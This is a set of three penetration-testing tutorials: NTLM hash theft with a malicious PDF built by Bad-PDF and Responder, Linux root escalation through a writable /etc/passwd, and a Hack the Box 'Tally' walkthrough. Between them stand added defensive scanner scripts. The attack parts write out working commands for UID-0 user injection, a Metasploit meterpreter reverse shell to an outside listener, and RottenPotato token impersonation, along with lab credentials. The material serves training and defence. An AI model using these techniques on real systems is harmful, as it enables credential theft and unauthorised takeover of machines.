Capture NTLM Hashes using PDF (Bad-Pdf)


Today we are demonstrating how NTLM hashes can be stolen through a PDF file. We have already discussed the various methods to capture NTLM hashes in a network in our previous article. Recently a new tool, “Bad-PDF”, was released, and in this article we are sharing our experience with it.
Bad-PDF creates a malicious PDF to steal NTLM (NTLMv1/NTLMv2) hashes from Windows machines; it utilizes a vulnerability disclosed by the Check Point research team to build the malicious PDF file. Bad-PDF reads the captured NTLM hashes using a Responder listener.
This method works with all PDF readers (any version), JavaScript is not required for the attack, and most EDR/endpoint solutions fail to detect it.
git clone https://github.com/deepzec/Bad-Pdf.git
cd Bad-Pdf
ls
chmod 777 badpdf.py

Now run the Python script with the following command:
python badpdf.py
It first tries to connect to Responder at its default path, /usr/bin/responder; in our case the Responder binary is located at /usr/sbin/responder. It then asks for your network IP, the name of the output file and the interface name; supply this information according to your network.

Then it creates a malicious PDF file named bad.pdf; now transfer this PDF file to your target.

When the victim opens our malicious file, their NTLM hash is captured as shown in the image below. Here you can observe the username ‘raj’ along with its password hash. Copy the hash value into a text document so that you can crack it to retrieve the password.

We pasted the hash value into a text file and saved it as "hash" on the desktop. We then used John the Ripper to crack the hash.
john hash
Awesome!!! We have retrieved the password: 133 for user: raj.
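As an added defensive example (not code from the Bad-PDF project or from the original article), the Python script below scans a PDF for /GoToE, /GoToR and /Launch actions whose /F file specification points at a UNC path. That is the pattern the Check Point disclosure described: the viewer tries to open the remote file over SMB and authenticates, which is what the Responder listener collects. The embedded PDF fragment is constructed for the demonstration with a documentation address and is not a working document; the function names scan_pdf and pdf_unescape are this example's own.

```python
import re
import sys

# Constructed sample: a minimal PDF fragment (not a working document) whose /OpenAction is a
# /GoToE action with a file specification pointing at a UNC path. 192.0.2.10 is a
# documentation address. In PDF literal strings a backslash is written as "\\", so the
# UNC path \\192.0.2.10\share\x appears in the file as (\\\\192.0.2.10\\share\\x).
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"4 0 obj << /Type /Action /S /GoToE /F (\\\\\\\\192.0.2.10\\\\share\\\\x) /D [ 0 /Fit ] >> endobj\n"
    b"%%EOF\n"
)
# Constructed benign sample: a /GoToR action to a relative local file, which must not be flagged.
BENIGN_PDF = b"4 0 obj << /Type /Action /S /GoToR /F (appendix.pdf) /D [ 0 /Fit ] >> endobj\n"

# One indirect object: "<num> <gen> obj ... endobj".
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
# Action subtypes that carry a file specification able to reference a remote file.
ACTION_RE = re.compile(rb"/S\s*/(GoToE|GoToR|Launch)\b")
# /F ( ... ) literal string; "\\." keeps escaped parentheses and backslashes inside the string.
FILESPEC_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)", re.S)


def pdf_unescape(raw: bytes) -> bytes:
    """Resolve the literal-string escapes that matter for a path: \\\\ -> \\, \\( -> (, \\) -> )."""
    return re.sub(rb"\\([\\()])", lambda m: m.group(1), raw)


def is_remote_path(path: bytes) -> bool:
    """A UNC target (\\\\host\\share, or //host/share as some viewers accept) triggers SMB authentication."""
    return path.startswith(b"\\\\") or path.startswith(b"//")


def scan_pdf(data: bytes) -> list:
    """Return one finding per action object whose /F string points at a remote (UNC) path.

    Only uncompressed objects are inspected: a production scanner must first inflate
    /FlateDecode object streams (/ObjStm), where a malicious action can equally be stored.
    """
    findings = []
    for m in OBJ_RE.finditer(data):
        obj_num, body = int(m.group(1)), m.group(2)
        action = ACTION_RE.search(body)
        if not action:
            continue
        for spec in FILESPEC_RE.finditer(body):
            target = pdf_unescape(spec.group(1))
            if is_remote_path(target):
                findings.append({
                    "object": obj_num,
                    "action": action.group(1).decode(),
                    "target": target.decode("latin-1"),
                })
    return findings


if __name__ == "__main__":
    # Usage: python pdf_unc_scan.py file.pdf   (falls back to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for f in scan_pdf(data):
        print(f"object {f['object']}: /{f['action']} action references remote file {f['target']}")
```

A hit on a document that arrived by mail is a strong indicator on its own, because ordinary PDFs have no reason to reference a file on an external host. Network-side, the same attack is blunted by blocking outbound TCP 445 at the egress firewall, so the leaked authentication never reaches an external listener.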


Privilege Escalation in Linux using /etc/passwd file

In this article, we will focus on exploring diverse techniques to modify the /etc/passwd file, enabling us to create or alter a user and grant them root privileges. It is crucial to understand how to edit your own user within the /etc/passwd file when dealing with privilege escalation on a compromised system. If you're interested, we have previously demonstrated this method for privilege escalation in our earlier articles. You can find the links below.

Table of Contents

About /etc/passwd file

·       Understand the basics

·       Adding a new user to /etc/passwd file

Different methods to create a password for /etc/passwd file

·       OpenSSL

·       Mkpasswd

·       Python

·       Perl

·       PHP

·       Ruby

·       Bonus: Hack Trick


Firstly, we should understand the /etc/passwd file in depth before getting to the point. Inside the /etc directory there are three very important files: passwd, group, and shadow.

/etc/passwd: A human-readable text file which stores user account information.

/etc/group: Also a human-readable text file; it stores group information, and which groups a user belongs to can be identified through this file.

/etc/shadow: A file that contains the encrypted passwords and account expiry information for each user.

The format of entries in the /etc/passwd file

Field-by-field description

Username: The first field indicates the name of the user, which is used to log in.

Encrypted password: The x denotes that the encrypted password is actually stored inside the /etc/shadow file. If the user does not have a password, the password field will contain an * (asterisk).

User ID (UID): Every user must be allotted a user ID (UID). UID 0 (zero) is kept for the root user and UIDs 1-99 are kept for other predefined accounts; UIDs 100-999 are kept by the system for administrative purposes. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given the UID 1001.

Group ID (GID): It denotes the primary group of each user; like UIDs, the first 100 GIDs are usually kept for system use. GID 0 relates to the root group and GID 1000 usually signifies the users. New groups are generally allotted GIDs beginning from 1000.

GECOS field: Usually this is a set of comma-separated values that gives more details about the user. The GECOS field holds the following information:

User’s full name

Building and room number or contact person

Office telephone number

Shell: It denotes the full path of the default shell that executes the user's commands and displays the results.

NOTE: Each field is separated by a colon (:).

Let’s Start Now!!

Adding User by Default Method

Let’s start by reading the /etc/passwd file with the cat command to view the users currently present on our system.

cat /etc/passwd

From the image given above, you can see that “pentest” is the last user, with UID 1000. Here GID 1000 denotes that it is a non-system user.

Let's see what happens in the ‘/etc/passwd’ file when we add a user with the adduser command. You can match the following information against the image given below.

adduser user1

Username: user1

GID: 1001

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

Other fields: Full Name, Room Number, Work Phone, Home Phone, Other (left blank)

 


When you open the /etc/passwd file you will notice that all of the above information has been stored inside it.

Repeat the steps to add user2 to /etc/passwd.

Now check with the tail command: user2 has been added to /etc/passwd and the following information is recorded accordingly.

GID: 1002

UID: 1002

Enter password: (Hidden)

Home Directory: /home/user2

For this privilege escalation the /etc/passwd file must be writable by the logged-in user; for the lab setup we give it full ‘rwx’ permissions.

chmod 777 /etc/passwd

Now our lab setup is done.

Possible Scenarios:

If /etc/passwd file is editable what would be the possible scenarios to escalate the privileges?

Scenario 1: Replace the password hash for existing users in /etc/passwd file with our encrypted password.

Scenario 2: Manually add a new root privilege user to /etc/passwd file with our encrypted password.

Scenario 3: Tampering with the root or a high-privilege user's password in the /etc/passwd file.

Let's start now!

Connect with this machine with SSH:

ssh pentest@192.168.1.22

tail /etc/passwd

ls -al /etc/passwd

It is clearly visible that the /etc/passwd file has all permissions (rwx for everyone).

OpenSSL

Sometimes executing the passwd command to set a user's password may not be feasible. In such situations the OpenSSL command can be used instead; it generates a salted password hash.

OpenSSL is a widely used open-source library that provides various cryptographic functions, protocols, and tools for securing communications over computer networks. The openssl passwd command allows you to generate password hashes for different algorithms, such as DES, MD5, SHA-256, and more.

Method 1

Here, we generated the password hash on our Kali machine.

openssl passwd raj

The $1$ prefix indicates that the generated password hash is in MD5-crypt format.

Now use this salted hash for the “aarti” user, appending the entry to /etc/passwd with the echo command.

echo 'aarti:$1$cJ05ZYPP$06zg1KtuJ/CbzTWPmeyNH1:0:0:root:/root:/bin/bash' >> /etc/passwd

Here you can observe that we have allotted UID 0 and GID 0 and the home directory /root, hence we have given root privileges to our user “aarti”. Now switch user, access the terminal as aarti and confirm the root access.

tail /etc/passwd

su aarti

id

 


Method 2

This method is relevant when OpenSSL is present on the victim's system, allowing us to generate the hash on the victim's machine itself.

openssl passwd 123

echo 'user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash' >> /etc/passwd

tail /etc/passwd

Now switch user and access the terminal through user3 and confirm the root access.

su user3

id

 


Cool!!! Both methods are working.

Mkpasswd

It is an alternative to OpenSSL. mkpasswd is a command-line tool used for producing password hashes for diverse authentication systems.

mkpasswd -m <method> <password>

Here, <method> specifies the hash algorithm (like sha-512, md5, etc.), and <password> is the password you want to hash.

mkpasswd -m SHA-512 pass123

 


You can use the echo method shown above to add the entry to the /etc/passwd file, or edit the file manually.

nano /etc/passwd

In the image below you can observe that I have allotted UID 0 and GID 0 and the home directory /root, hence we have given root privileges to our user4.

 

Now switch user and access the terminal through user4 and confirm the root access.

su user4

id



Great!!! It is also working.

Python

Python lets us supply a salt to crypt, producing a hash that embeds the salt value (the $6$ prefix selects SHA-512 crypt).

python2 -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'

If the above command does not work, use python3, or check the installed Python version with the “which python” command. Note that the crypt module was deprecated in Python 3.11 and removed in 3.13, so it is no longer available on a recent interpreter.

python3 -c 'import crypt; print (crypt.crypt("pass123", "$6$salt"))'

 

Use any method to edit /etc/passwd and put the hashed password into it, then switch to user5. Here we used the nano editor.

su user5

id

 


It is also working.

Perl

Similarly, we can create a hash for our password with a salt value using Perl's crypt function.

perl -le 'print crypt("pass123", "abc")'

 


You will get the encrypted password; repeat the manual step of adding the new user "user6", putting the encrypted value into the password field with the echo command.

echo 'user6:abBxjdJQWn8xw:0:0:root:/root:/bin/bash' >> /etc/passwd

Here you can see that we have allotted UID 0 and GID 0 and the home directory /root, hence we have given root privileges to our user6. Switch to the new user user6.

su user6

id

 


Great!! This method is also working.

PHP

The hash for our password may also be created using PHP along with crypt using the salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

 


You will get the encrypted password; repeat the same method of adding the new user "user7", putting the encrypted value into the password field with the echo command.

echo 'user7:121z.fuKOKzx.:0:0:root:/root:/bin/bash' >> /etc/passwd

In the image below you can observe that we have allotted UID 0 and GID 0 and the home directory /root, hence we have given root privileges to our user7.

tail -n 2 /etc/passwd

su user7

id

 


Working!!!

Ruby

As we have already used Python, Perl and PHP, Ruby can be used in the same way to create an encrypted password with crypt and a salt value.

ruby -r 'digest' -e 'puts "pass".crypt("$6$salt")'

 


Use any of the above ways to edit /etc/passwd and switch to the new user user8.

su user8

id

 


This is also working.

Bonus: Hack Trick

If you would rather not perform any of the above methods, try this!!!

If the /etc/passwd file has -rwxrwxrwx permissions on the victim system, open it and remove the ‘x’ or ‘*’ value in the root user's password field, as shown in the image below:

 


Methodology: The 'x' value in the /etc/passwd file indicates that the actual password hash is stored in the /etc/shadow file (or a similar location) rather than in /etc/passwd itself.

If you remove the 'x' value and replace it with something else or leave it blank, the root user's hash in /etc/shadow is no longer consulted, so the system cannot authenticate root with the stored hash; an empty field means no password is required at all.

Keep the root password blank and save the /etc/passwd file.

root::0:0:root:/root:/bin/bash

 


Now, switch to root user

su root

id



Boom… you have root access without a password. You can use this method on other high-privilege user accounts.

Hence there are many ways to escalate privileges via an editable /etc/passwd.
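As an added example (not part of the original article), the Python auditor below parses /etc/passwd into the seven fields described earlier and flags the conditions that every scenario in this article depends on: a password field that is empty (the bonus trick) or holds a hash instead of x (the OpenSSL, mkpasswd, Python, Perl, PHP and Ruby methods), an account other than root with UID or GID 0, duplicate UIDs, and a file mode writable by group or world (the chmod 777 lab setup). The sample content is constructed from the entries this article adds; audit_passwd and writable_by_others are this example's own names.

```python
import os
import stat

# Constructed sample built from the entries the article adds to the lab machine.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
pentest:x:1000:1000:pentest,,,:/home/pentest:/bin/bash
user1:x:1001:1001:,,,:/home/user1:/bin/bash
aarti:$1$cJ05ZYPP$06zg1KtuJ/CbzTWPmeyNH1:0:0:root:/root:/bin/bash
user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash
broken line without fields
"""

# Constructed sample for the bonus trick: root's password field emptied.
SAMPLE_BLANK_ROOT = "root::0:0:root:/root:/bin/bash\n"

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Yield (line_no, record) pairs; a malformed line is yielded with record=None."""
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            yield n, None
            continue
        rec = dict(zip(FIELDS, parts))
        rec["uid"], rec["gid"] = int(rec["uid"]), int(rec["gid"])
        yield n, rec


def audit_passwd(text):
    """Return (line_no, username, reason) findings for the conditions this article abuses."""
    findings = []
    seen_uid = {}
    for n, rec in parse_passwd(text):
        if rec is None:
            findings.append((n, None, "malformed entry"))
            continue
        name, pw = rec["name"], rec["passwd"]
        if pw == "":
            # Bonus trick: an empty field lets su/login succeed with no password.
            findings.append((n, name, "empty password field: login without a password"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # x means "see /etc/shadow"; * and !... mark locked accounts. Anything else is a
            # hash sitting in a world-readable file, which is what every method above produces.
            findings.append((n, name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if rec["uid"] == 0 and name != "root":
            findings.append((n, name, "UID 0 account other than root"))
        if rec["gid"] == 0 and name != "root":
            findings.append((n, name, "GID 0 (root group) account other than root"))
        if rec["uid"] in seen_uid:
            findings.append((n, name, f"duplicate UID {rec['uid']} (also {seen_uid[rec['uid']]})"))
        else:
            seen_uid[rec["uid"]] = name
    return findings


def writable_by_others(mode):
    """True if the file mode grants write to group or world, as the lab's chmod 777 does."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    # Usage: run on the live system; /etc/passwd is world-readable so no privileges are needed.
    with open("/etc/passwd") as fh:
        for line_no, user, reason in audit_passwd(fh.read()):
            print(f"line {line_no} ({user}): {reason}")
    if writable_by_others(os.stat("/etc/passwd").st_mode):
        print("/etc/passwd is writable by group or others")
```

On a healthy system the audit returns nothing and the mode is 0644; either a second UID 0 account or a non-x password field is worth an incident ticket, since neither appears through normal administration. The same checks are cheap to run from a file-integrity monitor each time /etc/passwd changes.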

Hack the Box Challenge: Tally Walkthrough


Hello Friends!! Today we are going to solve the CTF challenge “Tally”, a lab developed by Hack the Box. They have an amazing collection of online labs on which you can practice your penetration testing skills, designed for everyone from beginners to expert penetration testers. Tally is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable lab.
Let’s Begin!!
As these labs are only available online, they have static IPs. The Tally lab has IP 10.10.10.59.
Now, as always, let’s begin our hacking with port enumeration.

nmap -p- -A 10.10.10.59

When you browse to the target IP, it redirects to a SharePoint page as shown below, which nmap also reported in the image above.




We then used several directory brute-forcing tools to enumerate useful URLs on the web server but failed to retrieve any. So I explored the web directories manually with the help of Google search and gradually reached /sitepages/FinanceTeam.aspx, where I found the FTP username as shown in the image below.
Moreover, I found a link describing a SharePoint directory brute-force attack that helped me with my next step.

From inside the above-given link we found the URL http://10.10.10.59/shared documents/forms/allitems.aspx; when you open this path in your browser as shown below, you will see a file named "ftp-details". Download this doc file and open it.




You will get the password from inside the ftp-details doc file.

Now log into FTP using the following credentials and download tim.kdbx to your local machine.
Username: ftp_user
Password: UTDRSCH53c"$6hys




Since the file has a .kdbx extension and I didn't know much about it, I turned to a Google search and found this link to download a Python script that extracts a Hashcat/John-crackable hash from KeePass 1.x/2.x databases.
python keepass2john.py tim.kdbx > tim
Next, we used John the Ripper to crack the hash stored in “tim” with the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim




Once you have obtained the master password, install KeePass2, a password manager, with the following command:
apt-get install keepass2 -y
After installing, run the command below and enter “simplementeyo” in the master key field.
keepass2 tim.kdbx
You can then find a username and password under /Work/Windows/Shares for an SMB login, since ports 135-445 are open on the target machine for file sharing.
Here the password is masked with * characters; copy and paste it into a text file and you will get the password in plain text, i.e. Acc0unting.




Now that you have the SMB login credentials “Finance: Acc0unting”, execute the following command to connect to the target's network; it will show “ACCT” as a share name.
smbclient -L 10.10.10.59 -U Finance




Next, type the commands below and, once you find conn-info.txt, download it.
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt




When you download and open conn-info.txt, it reveals MSSQL database login credentials.
db: sa
pass: YE%TJC%&HYbe5Nw

From the image below you can observe that these were old server details, and the password for sa may have been changed since.



Log into SMB again and look for the next hint by moving into /zz_Migration; for that, execute the commands below:
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"
Here you will find tester.exe; download it.
get tester.exe

tester.exe is saved in your /root directory. Since the binary is large, it is impractical to find the desired information by reading it directly, so use the strings command together with grep.





strings tester.exe | grep DATABASE
This reveals a new password for the user sa, as shown in the image below.
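As an added example (not code from the walkthrough), the Python script below does what strings | grep does for this case: it pulls printable ASCII and UTF-16LE runs out of a binary and matches connection-string keys such as DATABASE= or Password=. Windows programs frequently store strings as UTF-16LE, which plain strings(1) misses without the -e l option, so both encodings are covered. The blob is constructed with placeholder values (no real credentials); extract_strings and find_credentials are this example's own names. Run over a build artifact before release, the same check catches credentials that would otherwise ship inside the executable, which is the defect the tester.exe binary demonstrates.

```python
import re
import sys

# Constructed sample binary: a fake DOS header, an ASCII connection string, some noise and a
# UTF-16LE connection string. Every value is a placeholder.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"
    + b"DATABASE=orcharddb;SERVER=192.0.2.20;UID=sa;PWD=PLACEHOLDER_pw\x00\x00"
    + b"\x01\x02\x03\x04"
    + "Data Source=dbhost;Password=PLACEHOLDER_2;".encode("utf-16-le")
    + b"\x00\x00\xde\xad"
)

# Runs of at least four printable characters, in ASCII and in UTF-16LE (char, NUL pairs).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
# Keys used by ODBC / ADO.NET style connection strings; the value runs up to the next ';'.
CRED_KEY = re.compile(
    r"(?i)\b(password|pwd|pass|database|server|uid|user id|data source)\s*=\s*([^;\x00]+)"
)


def extract_strings(data: bytes):
    """Return printable runs from the binary, like strings(1) plus its -e l (UTF-16LE) mode."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    return found


def find_credentials(data: bytes):
    """Return (key, value) pairs for connection-string settings embedded in the binary."""
    hits = []
    for s in extract_strings(data):
        for key, value in CRED_KEY.findall(s):
            hits.append((key, value.strip()))
    return hits


if __name__ == "__main__":
    # Usage: python find_creds.py tester.exe   (falls back to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for key, value in find_credentials(data):
        print(f"{key} = {value}")
```

The value of the check lies in what it returns, not in the grep itself: any Password or PWD hit on a shipped binary means the credential has to be treated as disclosed and rotated, and the build changed to read it from configuration or a secret store instead.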




For the next step I took help from our previous article on MSSQL penetration testing. Open a new terminal, load the Metasploit framework and execute the commands below.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted one-liner (the command ending in .dll) and paste it as the CMD command, as shown in the next image.




Now open a new terminal, load another Metasploit console and execute the commands below.
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit




You will get a meterpreter session on the victim's machine in your first Metasploit console; then finish the task by grabbing the user.txt and root.txt files. Type the following:
getuid
So currently we don't have NT AUTHORITY\SYSTEM permissions.




But we successfully grabbed the user.txt file from inside Sarah/Desktop.
cd Sarah/Desktop
ls
cat user.txt
In this way we have completed our first task. Now let's find root.txt!!




load incognito
The incognito extension for meterpreter was originally a stand-alone application that lets you impersonate user tokens after successfully compromising a system. The first thing we need to do is identify whether there are any valid tokens on this system.
list_token -u
As for impersonation tokens, you can see that currently no token is available.




Then I searched Google for such a scenario and found a link to download RottenPotato from GitHub for privilege escalation.
git clone https://github.com/foxglovesec/RottenPotato.git
After downloading, it provides the rottenpotato.exe file.




Upload the exe file to the victim's machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now type the commands below to execute the exe and then add the SYSTEM token under the impersonation tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
When you run the getuid command again, it will tell you that you have escalated to NT AUTHORITY\SYSTEM.




Then go back to the /Users directory and list the directories inside it. You will find root.txt inside C:\Users\Administrator\Desktop; go and grab it to finish the task.
cd Administrator
cd Desktop
ls
cat root.txt
Fabulous!! The task has been completed and we have hacked this box.